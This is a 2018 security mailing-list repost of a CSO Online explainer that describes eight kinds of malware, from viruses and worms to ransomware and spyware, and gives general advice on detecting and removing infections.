[BreachExchange] 8 types of malware and how to recognize them
Destry Winant
destry at riskbasedsecurity.com
Tue Jul 24 22:21:05 EDT 2018
https://www.csoonline.com/article/2615925/security/security-your-quick-guide-to-malware-types.html#tk.rss_news
People tend to play fast and loose with security terminology. However,
it's important to get your malware classifications straight because
knowing how various types of malware spread is vital to containing and
removing them.
This concise malware bestiary will help you get your malware terms
right when you hang out with geeks.
1. Viruses
A computer virus is what most of the media and regular end-users call
every malware program reported in the news. Fortunately, most malware
programs aren't viruses. A computer virus modifies other legitimate
host files (or pointers to them) in such a way that when a victim's
file is executed, the virus is also executed.
Pure computer viruses are uncommon today, comprising less than 10
percent of all malware. That's a good thing: Viruses are the only type
of malware that "infects" other files. That makes them particularly
hard to clean up because the malware must be executed from the
legitimate program. This has always been nontrivial, and today it's
almost impossible. The best antivirus programs struggle with doing it
correctly and in many (if not most) cases will simply quarantine or
delete the infected file instead.
2. Worms
Worms have been around even longer than computer viruses, all the way
back to mainframe days. Email brought them into fashion in the late
1990s, and for nearly a decade, computer security pros were besieged
by malicious worms that arrived as message attachments. One person
would open a wormed email and the entire company would be infected in
short order.
The distinctive trait of the worm is that it's self-replicating. Take
the notorious Iloveyou worm: When it went off, it hit nearly every
email user in the world, overloaded phone systems (with fraudulently
sent texts), brought down television networks, and even delayed my
daily afternoon paper for half a day. Several other worms, including
SQL Slammer and MS Blaster, ensured the worm's place in computer
security history.
What makes an effective worm so devastating is its ability to spread
without end-user action. Viruses, by contrast, require that an
end-user at least kick it off, before it can try to infect other
innocent files and users. Worms exploit other files and programs to do
the dirty work. For example, the SQL Slammer worm used a (patched)
vulnerability in Microsoft SQL to incur buffer overflows on nearly
every unpatched SQL server connected to the internet in about 10
minutes, a speed record that still stands today.
3. Trojans
Computer worms have been replaced by Trojan horse malware programs as
the weapon of choice for hackers. Trojans masquerade as legitimate
programs, but they contain malicious instructions. They've been around
forever, even longer than computer viruses, but have taken hold of
current computers more than any other type of malware.
A Trojan must be executed by its victim to do its work. Trojans
usually arrive via email or are pushed on users when they visit
infected websites. The most popular Trojan type is the fake antivirus
program, which pops up and claims you're infected, then instructs you
to run a program to clean your PC. Users swallow the bait and the
Trojan takes root.
Trojans are hard to defend against for two reasons: They're easy to
write (cyber criminals routinely produce and hawk Trojan-building
kits) and spread by tricking end-users — which a patch, firewall, and
other traditional defense cannot stop. Malware writers pump out
Trojans by the millions each month. Antimalware vendors try their best
to fight Trojans, but there are too many signatures to keep up with.
4. Hybrids and exotic forms
Today, most malware is a combination of traditional malicious
programs, often including parts of Trojans and worms and occasionally
a virus. Usually the malware program appears to the end-user as a
Trojan, but once executed, it attacks other victims over the network
like a worm.
Many of today's malware programs are considered rootkits or stealth
programs. Essentially, malware programs attempt to modify the
underlying operating system to take ultimate control and hide from
antimalware programs. To get rid of these types of programs, you must
remove the controlling component from memory, beginning with the
antimalware scan.
Bots are essentially Trojan/worm combinations that attempt to make
individual exploited clients a part of a larger malicious network.
Botmasters have one or more "command and control" servers that bot
clients check into to receive their updated instructions. Botnets
range in size from a few thousand compromised computers to huge
networks with hundreds of thousands of systems under the control of a
single botnet master. These botnets are often rented out to other
criminals who then use them for their own nefarious purposes.
5. Ransomware
Malware programs that encrypt your data and hold it as hostage waiting
for a cryptocurrency pay off has been a huge percentage of the malware
for the last few years, and the percentage is still growing.
Ransomware has often crippled companies, hospitals, police
departments, and even entire cities.
Most ransomware programs are Trojans, which means they must be spread
through social engineering of some sort. Once executed, most look for
and encrypt users’ files within a few minutes, although a few are now
taking a “wait-and-see” approach. By watching the user for a few hours
before setting off the encryption routine, the malware admin can
figure out exactly how much ransom the victim can afford and also be
sure to delete or encrypt other supposedly safe backups.
Ransomware can be prevented just like every other type of malware
program, but once executed, it can be hard to reverse the damage
without a good, validated backup. According to some studies, about a
quarter of the victims pay the ransom, and of those, about 30 percent
still do not get their files unlocked. Either way, unlocking the
encrypted files, if even possible, takes particular tools, decryption
keys and more than a bit of luck. The best advice is to make sure you
have a good, offline backup of all critical files.
6. Fileless malware
Fileless malware isn’t really a different category of malware, but
more of a description of how they exploit and persevere. Traditional
malware travels and infects new systems using the file system.
Fileless malware, which today comprises over 50 percent of all malware
and growing, is malware that doesn’t directly use files or the file
system. Instead they exploit and spread in memory only or using other
“non-file” OS objects such as registry keys, APIs or scheduled tasks.
Many fileless attacks begin by exploiting an existing legitimate
program, becoming a newly launched “sub-process,” or by using existing
legitimate tools built into the OS (like Microsoft’s PowerShell). The
end result is that fileless attacks are harder to detect and stop. If
you aren’t already very familiar with common fileless attack
techniques and programs, you probably should be if you want a career
in computer security.
7. Adware
If you're lucky, the only malware program you've come in contact with
is adware, which attempts to expose the compromised end-user to
unwanted, potentially malicious advertising. A common adware program
might redirect a user's browser searches to look-alike web pages that
contain other product promotions.
8. Spyware
Spyware is most often used by people who want to check on the computer
activities of loved ones. Of course, in targeted attacks, criminals
can use spyware to log the keystrokes of victims and gain access to
passwords or intellectual property.
Adware and spyware programs are usually the easiest to remove, often
because they aren't nearly as nefarious in their intentions as other
types of malware. Find the malicious executable and prevent it from
being executed — you're done.
A much bigger concern than the actual adware or spyware is the
mechanism it used to exploit the computer or user, be it social
engineering, unpatched software, or a dozen other root exploit causes.
This is because although a spyware or adware program’s intentions are
not as malicious, as say, a backdoor remote access trojan, they both
use the same methods to break in. The presence of an adware/spyware
program should serve as a warning that the device or user has some
sort of weakness that needs to be corrected, before real badness comes
calling.
Finding and removing malware
Today, many malware programs start out as a Trojan or worm, but then
dial home to a botnet and let human attackers into the victim's
computer and network. Many advanced persistent threat (APT) attacks
start out this way: They use Trojans to gain the initial foothold into
hundreds or thousands of companies, while the human attacks lurk, in
search of interesting intellectual property. The vast majority of
malware exists to steal money — directly out of a bank account or
indirectly by stealing passwords or identities.
If you're lucky, you can find malicious executables using a program
like Microsoft's Autoruns, Microsoft’s Process Explorer, or Silent
Runners. If the malware program is stealthy, you'll have to remove the
hiding component from memory first (if possible), then work on
extricating the rest of the program. Often, I'll boot Microsoft
Windows into Safe Mode or through another method, remove the suspected
stealth component (sometimes by just renaming it), and run a good
antivirus scanner a few times to clean up the remainders after the
stealth part is removed. Here’s one good tutorial on how to use
Process Explorer to discover and remove malware, and another here.
Unfortunately, finding and removing individual malware program
components can be a fool's errand. It's easy to get it wrong and miss
a component. Plus, you don't know whether the malware program has
modified the system in such a way that it will be impossible to make
it completely trustworthy again.
Unless you're well trained in malware removal and forensics, back up
the data (if needed), format the drive, and reinstall the programs and
data when you find malware on a computer. Patch it well and make sure
end-users know what they did wrong. That way, you get a trustworthy
computer platform and move ahead in the fight without any lingering
risks or questions.
More information about the BreachExchange
mailing list